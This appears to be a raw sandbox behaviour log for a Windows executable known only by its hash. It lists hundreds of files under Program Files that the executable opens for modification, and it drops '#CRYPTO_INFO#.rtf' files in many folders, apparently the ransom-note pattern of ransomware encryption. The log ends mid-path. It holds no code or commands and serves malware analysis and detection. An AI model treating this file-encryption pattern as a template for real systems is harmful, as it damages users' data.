8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\appstore.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-dialogs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\bg_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\content-types.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javapackager.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jce.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\sat_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightDemiBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_hover_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\export.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\kinit.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_duplicate_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_remove_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fr_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\flavormap.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\cs.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ind_prog.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\hu_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\db\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 